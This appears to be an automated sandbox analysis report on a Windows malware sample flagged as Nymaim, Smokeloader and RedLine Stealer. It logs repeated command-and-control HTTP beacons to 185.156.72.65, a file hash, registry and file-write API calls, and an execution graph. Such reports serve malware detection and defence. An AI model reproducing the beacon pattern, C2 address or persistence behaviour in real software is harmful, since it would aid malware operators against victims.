                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                    2 | 192.168.2.4 | 49738 | 185.156.72.65 | 80 | 7520 | C:\Users\user\Desktop\file.exe
                    Timestamp | Bytes transferred | Direction | Data
                    Nov 30, 2024 09:58:48.145662069 CET | 416 | OUT | GET /add?substr=mixtwo&s=three&sub=nosub HTTP/1.1
                    Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                    Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                    Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                    Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                    User-Agent: 1
                    Host: 185.156.72.65
                    Connection: Keep-Alive
                    Cache-Control: no-cache


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                    3 | 192.168.2.4 | 49746 | 185.156.72.65 | 80 | 7520 | C:\Users\user\Desktop\file.exe
                    Timestamp | Bytes transferred | Direction | Data
                    Nov 30, 2024 09:58:59.273277998 CET | 416 | OUT | GET /add?substr=mixtwo&s=three&sub=nosub HTTP/1.1
                    Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                    Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                    Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                    Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                    User-Agent: 1
                    Host: 185.156.72.65
                    Connection: Keep-Alive
                    Cache-Control: no-cache


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                    4 | 192.168.2.4 | 49802 | 185.156.72.65 | 80 | 7520 | C:\Users\user\Desktop\file.exe
                    Timestamp | Bytes transferred | Direction | Data
                    Nov 30, 2024 09:59:24.336745024 CET | 416 | OUT | GET /add?substr=mixtwo&s=three&sub=nosub HTTP/1.1
                    Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                    Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                    Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                    Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                    User-Agent: 1
                    Host: 185.156.72.65
                    Connection: Keep-Alive
                    Cache-Control: no-cache


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                    5 | 192.168.2.4 | 49857 | 185.156.72.65 | 80 | 7520 | C:\Users\user\Desktop\file.exe
                    Timestamp | Bytes transferred | Direction | Data
                    Nov 30, 2024 09:59:49.400449991 CET | 416 | OUT | GET /add?substr=mixtwo&s=three&sub=nosub HTTP/1.1
                    Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                    Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                    Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                    Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                    User-Agent: 1
                    Host: 185.156.72.65
                    Connection: Keep-Alive
                    Cache-Control: no-cache


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                    6 | 192.168.2.4 | 49913 | 185.156.72.65 | 80 | 7520 | C:\Users\user\Desktop\file.exe
                    Timestamp | Bytes transferred | Direction | Data
                    Nov 30, 2024 10:00:14.575529099 CET | 416 | OUT | GET /add?substr=mixtwo&s=three&sub=nosub HTTP/1.1
                    Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                    Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                    Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                    Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                    User-Agent: 1
                    Host: 185.156.72.65
                    Connection: Keep-Alive
                    Cache-Control: no-cache


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                    7 | 192.168.2.4 | 49969 | 185.156.72.65 | 80 | 7520 | C:\Users\user\Desktop\file.exe
                    Timestamp | Bytes transferred | Direction | Data
                    Nov 30, 2024 10:00:39.606142998 CET | 416 | OUT | GET /add?substr=mixtwo&s=three&sub=nosub HTTP/1.1
                    Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                    Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                    Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                    Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                    User-Agent: 1
                    Host: 185.156.72.65
                    Connection: Keep-Alive
                    Cache-Control: no-cache


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                    8 | 192.168.2.4 | 50010 | 185.156.72.65 | 80 | 7520 | C:\Users\user\Desktop\file.exe
                    Timestamp | Bytes transferred | Direction | Data
                    Nov 30, 2024 10:01:04.805888891 CET | 416 | OUT | GET /add?substr=mixtwo&s=three&sub=nosub HTTP/1.1
                    Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                    Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                    Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                    Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                    User-Agent: 1
                    Host: 185.156.72.65
                    Connection: Keep-Alive
                    Cache-Control: no-cache


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                    9 | 192.168.2.4 | 50011 | 185.156.72.65 | 80 | 7520 | C:\Users\user\Desktop\file.exe
                    Timestamp | Bytes transferred | Direction | Data
                    Nov 30, 2024 10:01:29.932446957 CET | 416 | OUT | GET /add?substr=mixtwo&s=three&sub=nosub HTTP/1.1
                    Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                    Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                    Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                    Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                    User-Agent: 1
                    Host: 185.156.72.65
                    Connection: Keep-Alive
                    Cache-Control: no-cache


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                    10 | 192.168.2.4 | 50012 | 185.156.72.65 | 80 | 7520 | C:\Users\user\Desktop\file.exe
                    Timestamp | Bytes transferred | Direction | Data
                    Nov 30, 2024 10:01:51.087594032 CET | 416 | OUT | GET /add?substr=mixtwo&s=three&sub=nosub HTTP/1.1
                    Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                    Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                    Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                    Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                    User-Agent: 1
                    Host: 185.156.72.65
                    Connection: Keep-Alive
                    Cache-Control: no-cache


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                    11 | 192.168.2.4 | 50013 | 185.156.72.65 | 80 | 7520 | C:\Users\user\Desktop\file.exe
                    Timestamp | Bytes transferred | Direction | Data
                    Nov 30, 2024 10:01:58.227591991 CET | 416 | OUT | GET /add?substr=mixtwo&s=three&sub=nosub HTTP/1.1
                    Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                    Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                    Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                    Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                    User-Agent: 1
                    Host: 185.156.72.65
                    Connection: Keep-Alive
                    Cache-Control: no-cache



                    Target ID:0
                    Start time:03:57:54
                    Start date:30/11/2024
                    Path:C:\Users\user\Desktop\file.exe
                    Wow64 process (32bit):true
                    Commandline:"C:\Users\user\Desktop\file.exe"
                    Imagebase:0x400000
                    File size:2'028'032 bytes
                    MD5 hash:97E06ACDD95DB30F5421CD163F25EC93
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Yara matches:
                    • Rule: JoeSecurity_Nymaim, Description: Yara detected Nymaim, Source: 00000000.00000002.4110382379.0000000004940000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                    • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000000.00000002.4110382379.0000000004940000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                    • Rule: JoeSecurity_Nymaim, Description: Yara detected Nymaim, Source: 00000000.00000003.1670201728.0000000004A30000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                    • Rule: JoeSecurity_Nymaim, Description: Yara detected Nymaim, Source: 00000000.00000002.4108682490.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
                    • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000000.00000002.4110300371.0000000004790000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                    Reputation:low
                    Has exited:false


                      Execution Graph

                      Execution Coverage:1.5%
                      Dynamic/Decrypted Code Coverage:5.4%
                      Signature Coverage:3.6%
                      Total number of Nodes:558
                      Total number of Limit Nodes:5
                      execution_graph 31740 4797cb9 31743 4797cc4 31740->31743 31744 4797cd3 31743->31744 31747 4798464 31744->31747 31749 479847f 31747->31749 31748 4798488 CreateToolhelp32Snapshot 31748->31749 31750 47984a4 Module32First 31748->31750 31749->31748 31749->31750 31751 47984b3 31750->31751 31753 4797cc3 31750->31753 31754 4798123 31751->31754 31755 479814e 31754->31755 31756 4798197 31755->31756 31757 479815f VirtualAlloc 31755->31757 31756->31756 31757->31756 31758 5f96fe 31759 5f9704 31758->31759 31760 5fd287 RegOpenKeyA 31759->31760 31761 5fd260 RegOpenKeyA 31759->31761 31763 5fd2a4 31760->31763 31761->31760 31762 5fd27d 31761->31762 31762->31760 31763->31763 31764 40a0b1 31765 40a0bd ___scrt_is_nonwritable_in_current_image 31764->31765 31792 409e11 31765->31792 31767 40a0c4 31768 40a217 31767->31768 31774 40a0ee ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock CallUnexpected 31767->31774 31819 40a58a IsProcessorFeaturePresent IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter CallUnexpected 31768->31819 31770 40a21e 31820 4106ab 21 API calls CallUnexpected 31770->31820 31772 40a224 31821 41066f 21 API calls CallUnexpected 31772->31821 31776 40a10d 31774->31776 31777 40a18e 31774->31777 31818 410685 39 API calls 3 library calls 31774->31818 31775 40a22c 31800 40a6a5 31777->31800 31793 409e1a 31792->31793 31822 40a2ec IsProcessorFeaturePresent 31793->31822 31795 409e26 31823 40b77d 10 API calls 2 library calls 31795->31823 31797 409e2b 31799 409e2f 31797->31799 31824 40b79c 7 API calls 2 library calls 31797->31824 31799->31767 31825 40b570 31800->31825 31803 40a194 31804 412288 31803->31804 31827 41816d 31804->31827 31806 412291 31808 40a19c 31806->31808 31833 41841d 39 API calls 31806->31833 31809 4087e0 31808->31809 31836 402460 31809->31836 31812 402460 43 API calls 31813 408807 31812->31813 31840 405a50 31813->31840 31818->31777 31819->31770 31820->31772 31821->31775 31822->31795 31823->31797 31824->31799 
31826 40a6b8 GetStartupInfoW 31825->31826 31826->31803 31828 4181a8 31827->31828 31829 418176 31827->31829 31828->31806 31834 41299d 39 API calls 3 library calls 31829->31834 31831 418199 31835 417f78 49 API calls 3 library calls 31831->31835 31833->31806 31834->31831 31835->31828 31837 402483 31836->31837 31837->31837 32155 402760 31837->32155 31839 402495 31839->31812 32182 410822 GetSystemTimeAsFileTime 31840->32182 31842 405a9f 32184 4106e2 31842->32184 31845 402760 43 API calls 31846 405ada 31845->31846 31847 402760 43 API calls 31846->31847 31848 405ca0 31847->31848 32187 403ab0 31848->32187 31850 405e9f 32199 406c40 31850->32199 31852 40620c 31853 402460 43 API calls 31852->31853 31854 40621c 31853->31854 32209 402390 31854->32209 31856 406230 32217 406ee0 31856->32217 31858 40630a 31859 402460 43 API calls 31858->31859 31860 40631a 31859->31860 31861 402390 39 API calls 31860->31861 31862 40632e 31861->31862 31863 406404 31862->31863 31864 406336 31862->31864 32280 407290 53 API calls 2 library calls 31863->32280 32272 406f60 53 API calls 2 library calls 31864->32272 31867 406409 31870 402460 43 API calls 31867->31870 31868 40633b 31869 402460 43 API calls 31868->31869 31871 40634b 31869->31871 31872 406419 31870->31872 32273 4023e0 39 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 31871->32273 31876 402390 39 API calls 31872->31876 31874 406354 31875 402390 39 API calls 31874->31875 31877 40635c 31875->31877 31878 40642d 31876->31878 32274 406ff0 53 API calls 2 library calls 31877->32274 31880 4064ee 31878->31880 32281 407310 53 API calls 2 library calls 31878->32281 32289 407630 53 API calls 2 library calls 31880->32289 31881 406361 31886 402460 43 API calls 31881->31886 31884 40643a 31887 402460 43 API calls 31884->31887 31885 4064f8 31888 402460 43 API calls 31885->31888 31889 406371 31886->31889 31890 40644a 31887->31890 31891 406508 31888->31891 32275 4023e0 39 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 31889->32275 32282 4023e0 39 API calls 
std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 31890->32282 31899 402390 39 API calls 31891->31899 31894 40637a 31895 402390 39 API calls 31894->31895 31897 406382 31895->31897 31896 406453 31898 402390 39 API calls 31896->31898 32276 407070 53 API calls 2 library calls 31897->32276 31901 40645b 31898->31901 31902 40651c 31899->31902 32283 407390 53 API calls 2 library calls 31901->32283 31905 406603 31902->31905 32290 4076b0 53 API calls 2 library calls 31902->32290 31903 406387 31911 402460 43 API calls 31903->31911 32300 407a50 53 API calls 2 library calls 31905->32300 31907 406460 31913 402460 43 API calls 31907->31913 31909 40660d 31914 402460 43 API calls 31909->31914 31910 406529 31916 402460 43 API calls 31910->31916 31912 406397 31911->31912 31920 402390 39 API calls 31912->31920 31915 406470 31913->31915 31917 40661d 31914->31917 32284 4023e0 39 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 31915->32284 31919 406539 31916->31919 31930 402390 39 API calls 31917->31930 32291 4023e0 39 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 31919->32291 31924 4063ab 31920->31924 31921 406479 31925 402390 39 API calls 31921->31925 31923 406542 31927 402390 39 API calls 31923->31927 31928 4063cc 31924->31928 31929 4063af 31924->31929 31926 406481 31925->31926 32285 407410 53 API calls 2 library calls 31926->32285 31932 40654a 31927->31932 32278 407180 53 API calls 2 library calls 31928->32278 32277 407100 53 API calls 2 library calls 31929->32277 31935 406631 31930->31935 32292 407730 53 API calls 2 library calls 31932->32292 31940 4066b3 31935->31940 31941 406635 31935->31941 31936 406486 31948 402460 43 API calls 31936->31948 31938 4063d1 31949 402460 43 API calls 31938->31949 31939 4063b4 31947 402460 43 API calls 31939->31947 32307 407c70 53 API calls 2 library calls 31940->32307 32301 407ae0 53 API calls 2 library calls 31941->32301 31943 40654f 31952 402460 43 API calls 31943->31952 31945 4066b8 31954 402460 43 API calls 31945->31954 31946 40663a 31955 402460 43 API 
calls 31946->31955 31950 4063c4 31947->31950 31951 406496 31948->31951 31953 4063e1 31949->31953 32326 4023e0 39 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 31950->32326 31963 402390 39 API calls 31951->31963 31956 40655f 31952->31956 31965 402390 39 API calls 31953->31965 31958 4066c8 31954->31958 31959 40664a 31955->31959 32293 4023e0 39 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 31956->32293 31972 402390 39 API calls 31958->31972 32302 4023e0 39 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 31959->32302 31961 406875 31966 402390 39 API calls 31961->31966 31968 4064aa 31963->31968 31964 406568 31969 402390 39 API calls 31964->31969 31970 4063f5 31965->31970 31971 4066a7 31966->31971 31967 406653 31973 402390 39 API calls 31967->31973 31974 4064b8 31968->31974 31975 4064ae 31968->31975 31976 406570 31969->31976 31970->31971 32279 407210 53 API calls 2 library calls 31970->32279 32227 4017a0 31971->32227 31977 4066dc 31972->31977 31978 40665b 31973->31978 32287 407520 53 API calls 2 library calls 31974->32287 32286 4074a0 53 API calls 2 library calls 31975->32286 32294 4077b0 53 API calls 2 library calls 31976->32294 31985 4066e0 31977->31985 31986 40675e 31977->31986 32303 407b60 53 API calls 2 library calls 31978->32303 31983 4064bd 31997 402460 43 API calls 31983->31997 32308 407d00 53 API calls 2 library calls 31985->32308 32314 407e80 53 API calls 2 library calls 31986->32314 31988 406575 31996 402460 43 API calls 31988->31996 31989 4068a1 32231 4083f0 31989->32231 31992 406660 32001 402460 43 API calls 31992->32001 31994 406763 32003 402460 43 API calls 31994->32003 31995 4066e5 32004 402460 43 API calls 31995->32004 31999 406585 31996->31999 32000 4064cd 31997->32000 31998 4068aa 32008 402460 43 API calls 31998->32008 32295 4023e0 39 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 31999->32295 32014 402390 39 API calls 32000->32014 32005 406670 32001->32005 32009 406773 32003->32009 32010 4066f5 32004->32010 32304 4023e0 39 API calls 
std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 32005->32304 32007 40658e 32013 402390 39 API calls 32007->32013 32015 4068bd 32008->32015 32021 402390 39 API calls 32009->32021 32309 4023e0 39 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 32010->32309 32012 406679 32017 402390 39 API calls 32012->32017 32018 406596 32013->32018 32019 4064e1 32014->32019 32241 408370 32015->32241 32016 4066fe 32022 402390 39 API calls 32016->32022 32023 406681 32017->32023 32296 407830 53 API calls 2 library calls 32018->32296 32019->31971 32288 4075b0 53 API calls 2 library calls 32019->32288 32026 406787 32021->32026 32027 406706 32022->32027 32305 407bf0 53 API calls 2 library calls 32023->32305 32025 4068c8 32035 402460 43 API calls 32025->32035 32031 40678b 32026->32031 32032 4067de 32026->32032 32310 407d80 53 API calls 2 library calls 32027->32310 32029 40659b 32041 402460 43 API calls 32029->32041 32315 407f10 53 API calls 2 library calls 32031->32315 32320 4080d0 53 API calls 2 library calls 32032->32320 32034 406686 32044 402460 43 API calls 32034->32044 32039 4068db 32035->32039 32037 40670b 32047 402460 43 API calls 32037->32047 32251 4082d0 32039->32251 32040 406790 32049 402460 43 API calls 32040->32049 32045 4065ab 32041->32045 32042 4067e3 32052 402460 43 API calls 32042->32052 32048 406696 32044->32048 32057 402390 39 API calls 32045->32057 32046 4068e6 32059 402460 43 API calls 32046->32059 32050 40671b 32047->32050 32306 4023e0 39 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 32048->32306 32054 4067a0 32049->32054 32311 4023e0 39 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 32050->32311 32053 4067f3 32052->32053 32068 402390 39 API calls 32053->32068 32316 4023e0 39 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 32054->32316 32056 40669f 32062 402390 39 API calls 32056->32062 32058 4065bf 32057->32058 32063 4065c8 32058->32063 32297 4078c0 53 API calls 2 library calls 32058->32297 32064 4068f9 32059->32064 32061 406724 32066 402390 39 API calls 32061->32066 
32062->31971 32298 407940 53 API calls 2 library calls 32063->32298 32261 408da0 32064->32261 32065 4067a9 32071 402390 39 API calls 32065->32071 32072 40672c 32066->32072 32073 406807 32068->32073 32076 4067b1 32071->32076 32312 407e00 53 API calls 2 library calls 32072->32312 32073->31971 32321 408150 53 API calls 2 library calls 32073->32321 32074 4065d2 32085 402460 43 API calls 32074->32085 32317 407fd0 53 API calls 2 library calls 32076->32317 32080 406731 32087 402460 43 API calls 32080->32087 32082 406926 32269 408eb0 32082->32269 32083 4067b6 32091 402460 43 API calls 32083->32091 32084 406810 32096 402460 43 API calls 32084->32096 32088 4065e2 32085->32088 32092 406741 32087->32092 32101 402390 39 API calls 32088->32101 32090 408e00 43 API calls 32093 406953 32090->32093 32094 4067c6 32091->32094 32313 4023e0 39 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 32092->32313 32097 408eb0 43 API calls 32093->32097 32318 4023e0 39 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 32094->32318 32100 406820 32096->32100 32102 406968 32097->32102 32099 40674a 32104 402390 39 API calls 32099->32104 32322 4023e0 39 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 32100->32322 32106 4065f6 32101->32106 32107 408e00 43 API calls 32102->32107 32103 4067cf 32108 402390 39 API calls 32103->32108 32104->31971 32106->31971 32299 4079d0 53 API calls 2 library calls 32106->32299 32111 406980 32107->32111 32112 4067d7 32108->32112 32109 406829 32113 402390 39 API calls 32109->32113 32114 402390 39 API calls 32111->32114 32319 408050 53 API calls 2 library calls 32112->32319 32116 406831 32113->32116 32118 40698e 32114->32118 32323 4081d0 53 API calls 2 library calls 32116->32323 32120 402390 39 API calls 32118->32120 32119 406836 32124 402460 43 API calls 32119->32124 32121 406999 32120->32121 32122 402390 39 API calls 32121->32122 32125 4069a4 32122->32125 32123 4067dc 32126 402460 43 API calls 32123->32126 32127 406846 32124->32127 32128 402390 39 API calls 32125->32128 
32126->31950 32324 4023e0 39 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 32127->32324 32130 4069af 32128->32130 32132 402390 39 API calls 32130->32132 32131 40684f 32133 402390 39 API calls 32131->32133 32134 4069ba 32132->32134 32136 406857 32133->32136 32135 402390 39 API calls 32134->32135 32137 4069c5 32135->32137 32325 408250 53 API calls 2 library calls 32136->32325 32139 402390 39 API calls 32137->32139 32140 4069d0 32139->32140 32141 402390 39 API calls 32140->32141 32144 4069df 32141->32144 32142 406a3e Sleep 32142->32144 32143 402460 43 API calls 32143->32144 32144->32142 32144->32143 32145 406a47 32144->32145 32146 402390 39 API calls 32145->32146 32147 406a4f 32146->32147 32327 408c80 43 API calls 2 library calls 32147->32327 32149 406a60 32328 408c80 43 API calls 2 library calls 32149->32328 32151 406a79 32329 408c80 43 API calls 2 library calls 32151->32329 32153 406a8c 32330 404f70 130 API calls 6 library calls 32153->32330 32156 402830 32155->32156 32157 40277f 32155->32157 32173 401600 43 API calls 3 library calls 32156->32173 32158 40278b __InternalCxxFrameHandler 32157->32158 32160 4027b3 32157->32160 32163 4027f7 32157->32163 32164 4027ee 32157->32164 32158->31839 32171 401560 41 API calls 4 library calls 32160->32171 32161 402835 32174 401560 41 API calls 3 library calls 32161->32174 32170 4027cf __InternalCxxFrameHandler 32163->32170 32172 401560 41 API calls 4 library calls 32163->32172 32164->32160 32164->32161 32165 4027c6 32165->32170 32175 40cfef 32165->32175 32170->31839 32171->32165 32172->32170 32173->32161 32174->32165 32180 40cf2b 39 API calls ___std_exception_copy 32175->32180 32177 40cffe 32181 40d00c 11 API calls CallUnexpected 32177->32181 32179 40d00b 32180->32177 32181->32179 32183 41085b __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 32182->32183 32183->31842 32331 4128e2 GetLastError 32184->32331 32198 403af1 std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 32187->32198 32191 403c33 32191->31850 32192 403b8d 32194 403bd1 
                      APIs
                      • GetTempPathA.KERNEL32(00000104,?,79D989F6,74DF0F00,00000000), ref: 00403DAA
                      • CreateDirectoryA.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,?), ref: 00403F39
                      • Sleep.KERNEL32(000003E8), ref: 00403F42
                      • __Init_thread_footer.LIBCMT ref: 00404517
                      • __Init_thread_footer.LIBCMT ref: 004046DD
                      • SHGetFolderPathA.SHELL32(00000000,00000000,00000000,00000000,?,00000000,?,00406AC1,0041D835,0042D9B8,0042D9B9,?,00000000,00000000,0042DB70,0042DB71), ref: 004048E7
                      • __Init_thread_footer.LIBCMT ref: 00404975
                      • __Init_thread_footer.LIBCMT ref: 00404BDE
                      • CoInitialize.OLE32(00000000), ref: 00404C5F
                      • CoCreateInstance.OLE32(0041F290,00000000,00000001,0041F260,?,?,00406AC1,0041D835,0042D9B8,0042D9B9,?,00000000,00000000,0042DB70,0042DB71), ref: 00404C7A
                      • __Init_thread_footer.LIBCMT ref: 004050DD
                      • Sleep.KERNEL32(00000BB8,00000000,?,00406AA1,0041D8D0,0042DBDC,0042DBDD), ref: 004052F5
                      • __Init_thread_footer.LIBCMT ref: 004053EB
                      • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,000000FF,?,00000104,?,00406AC1,0041D835,0042D9B8,0042D9B9,?,00000000,00000000,0042DB70,0042DB71), ref: 00404CE8
                        • Part of subcall function 00410822: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,00405A9F,00000000,79D989F6), ref: 00410837
                        • Part of subcall function 00410822: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00410856
                      • CoUninitialize.OLE32(?,00406AC1,0041D835,0042D9B8,0042D9B9,?,00000000,00000000,0042DB70,0042DB71,?,?,?,?,00000000,0042D9A0), ref: 00404D21
                      • CoUninitialize.OLE32(?,?,0042DB71,?,?,?,?,00000000,0042D9A0,0042D9A1), ref: 00404DE4
                      • CoUninitialize.OLE32(?,?,?,?,?,0042DB71,?,?,?,?,00000000,0042D9A0,0042D9A1), ref: 00404E65
                      • __Init_thread_footer.LIBCMT ref: 00404046
                        • Part of subcall function 00409C7B: EnterCriticalSection.KERNEL32(0042D064,?,?,00401089,0042DBF4,0041DCC0), ref: 00409C85
                        • Part of subcall function 00409C7B: LeaveCriticalSection.KERNEL32(0042D064,?,?,00401089,0042DBF4,0041DCC0), ref: 00409CB8
                        • Part of subcall function 00409C7B: RtlWakeAllConditionVariable.NTDLL ref: 00409D2F
                        • Part of subcall function 00402220: CreateFileA.KERNEL32(?,40000000,00000001,00000000,00000002,00000080,00000000), ref: 00402256
                        • Part of subcall function 00402220: WriteFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 00402277
                        • Part of subcall function 00402220: CloseHandle.KERNEL32(00000000), ref: 0040227E
                      • __Init_thread_footer.LIBCMT ref: 00404222
                        • Part of subcall function 00409CC5: EnterCriticalSection.KERNEL32(0042D064,?,?,?,0040104A,0042DBF4), ref: 00409CD0
                        • Part of subcall function 00409CC5: LeaveCriticalSection.KERNEL32(0042D064,?,?,?,0040104A,0042DBF4), ref: 00409D0D
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.4108682490.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: Init_thread_footer$CriticalSection$CreateFileUninitialize$EnterLeavePathSleepTime$ByteCharCloseConditionDirectoryFolderHandleInitializeInstanceMultiSystemTempUnothrow_t@std@@@VariableWakeWideWrite__ehfuncinfo$??2@
                      • String ID: 185.156.72.65$O@K\$SUB=$Y@BA$ZK\.$get$rmBK
                      • API String ID: 995133137-3578497191
                      • Opcode ID: ce9b54ea2defedab38e7e3161f400f5d63c440566f465774b986bf57360a8c7f
                      • Instruction ID: 6a8ba5f9be4b72ae1469cca8882757b6bc7ac7481bdf7cf44a4378d84f27710c
                      • Opcode Fuzzy Hash: ce9b54ea2defedab38e7e3161f400f5d63c440566f465774b986bf57360a8c7f
                      • Instruction Fuzzy Hash: 44F2DFB0E042549BDB24DF24DC48B9EBBB0EF45304F5442E9E5097B2D2DB78AA84CF59

                      Control-flow Graph

                      APIs
                        • Part of subcall function 00410822: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,00405A9F,00000000,79D989F6), ref: 00410837
                        • Part of subcall function 00410822: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00410856
                        • Part of subcall function 00409CC5: EnterCriticalSection.KERNEL32(0042D064,?,?,?,0040104A,0042DBF4), ref: 00409CD0
                        • Part of subcall function 00409CC5: LeaveCriticalSection.KERNEL32(0042D064,?,?,?,0040104A,0042DBF4), ref: 00409D0D
                      • __Init_thread_footer.LIBCMT ref: 004050DD
                      • Sleep.KERNEL32(00000BB8,00000000,?,00406AA1,0041D8D0,0042DBDC,0042DBDD), ref: 004052F5
                      • __Init_thread_footer.LIBCMT ref: 004053EB
                      • Sleep.KERNEL32(000007D0), ref: 00405755
                      • Sleep.KERNEL32(000007D0), ref: 0040576F
                      • CoUninitialize.OLE32(?,?,0042DC19,?,?,?,?,?,?,?,?,?,?,00000000,0042DBDD), ref: 004057A5
                      • CoUninitialize.OLE32(?,?,?,?,?,0042DC19,?,?,?,?,?,?,?), ref: 004057D1
                      • RegCreateKeyExA.ADVAPI32(80000001,?,00000000,00000000,00000000,00000000,00000000,?,?), ref: 00405923
                      • RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020006,?), ref: 00405945
                      • RegSetValueExA.ADVAPI32(?,?,00000000,00000001,?), ref: 0040596D
                      • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00405976
                      • Sleep.KERNEL32(000003E8), ref: 00405AB0
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.4108682490.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                      Yara matches
                      Similarity
